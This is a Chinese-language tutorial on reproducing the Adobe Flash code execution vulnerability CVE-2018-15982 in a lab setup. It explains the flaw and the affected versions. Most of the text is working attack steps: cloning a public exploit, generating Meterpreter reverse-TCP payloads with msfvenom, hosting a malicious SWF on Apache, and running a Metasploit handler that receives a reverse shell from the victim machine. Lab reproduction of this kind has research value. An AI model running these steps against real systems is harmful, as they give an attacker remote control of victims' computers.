溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

如何進(jìn)行任意代碼執(zhí)行漏洞CVE-2018-15982復(fù)現(xiàn)

發(fā)布時(shí)間:2021-12-29 15:45:20 來源:億速云 閱讀:155 作者:柒染 欄目:網(wǎng)絡(luò)安全

這篇文章給大家介紹如何進(jìn)行任意代碼執(zhí)行漏洞CVE-2018-15982復(fù)現(xiàn),內(nèi)容非常詳細(xì),感興趣的小伙伴們可以參考借鑒,希望對(duì)大家能有所幫助。

漏洞描述:

2018年11月29日,某團(tuán)隊(duì)在全球范圍內(nèi)第一時(shí)間發(fā)現(xiàn)一起針對(duì)俄羅斯的APT攻擊行動(dòng),通過一份俄文內(nèi)容的醫(yī)院員工問卷文檔,攜帶最新的Flash 0day漏洞和具有自毀功能的專屬木馬程序,該漏洞(CVE-2018-15982)允許攻擊者惡意制作的Flash對(duì)象在受害者的計(jì)算機(jī)上執(zhí)行代碼,從而獲取對(duì)系統(tǒng)命令行的訪問權(quán)限。

受影響的版本:

AdobeFlash Player <= 31.0.0.153

AdobeFlash Player Installer<= 31.0.0.108

不受影響的版本:

AdobeFlash Player 32.0.0.101

AdobeFlash Player Installer 31.0.0.122

復(fù)現(xiàn)環(huán)境:

攻擊機(jī):Linux kali (IP:190.168.23.130)

靶機(jī):Windows 7 X64 (IP:192.168.23.133)

復(fù)現(xiàn)過程:

git clone漏洞poc

git clone https://github.com/Ridter/CVE-2018-15982_EXP

如何進(jìn)行任意代碼執(zhí)行漏洞CVE-2018-15982復(fù)現(xiàn)

創(chuàng)建payload程序

msfvenom -p windows/meterpreter/reverse_tcp_rc4RC4PASSWORD=ZALE LPORT=4444 LHOST=192.168.23.130 -f raw > 86.bin

msfvenom -p windows/meterpreter/reverse_tcp_rc4RC4PASSWORD=ZALE LPORT=4444 LHOST=192.168.23.130 -f raw > 64.bin

如何進(jìn)行任意代碼執(zhí)行漏洞CVE-2018-15982復(fù)現(xiàn)

會(huì)生成兩個(gè)bin文件,分別為86bin和64bin

poc執(zhí)行并開啟http

生成poc

cp *.bin CVE-2018-15982_EXP/

cd CVE-2018-15982_EXP/

python CVE_2018_15982.py -i 86.bin -I 64.bin

如何進(jìn)行任意代碼執(zhí)行漏洞CVE-2018-15982復(fù)現(xiàn)

開啟web服務(wù)

service apache2 start

cp index.html /var/www/html/

cp exploit.swf /var/www/html/

如何進(jìn)行任意代碼執(zhí)行漏洞CVE-2018-15982復(fù)現(xiàn)

msf監(jiān)聽

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp_rc4

set lport 4444

set lhost 192.168.23.130

set RC4PASSWORD zale

run

如何進(jìn)行任意代碼執(zhí)行漏洞CVE-2018-15982復(fù)現(xiàn)

通過靶機(jī)訪問http://192.168.23.130/index.html

如何進(jìn)行任意代碼執(zhí)行漏洞CVE-2018-15982復(fù)現(xiàn)

可以看到返回shell

如何進(jìn)行任意代碼執(zhí)行漏洞CVE-2018-15982復(fù)現(xiàn)

關(guān)于如何進(jìn)行任意代碼執(zhí)行漏洞CVE-2018-15982復(fù)現(xiàn)就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,可以學(xué)到更多知識(shí)。如果覺得文章不錯(cuò),可以把它分享出去讓更多的人看到。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請(qǐng)聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI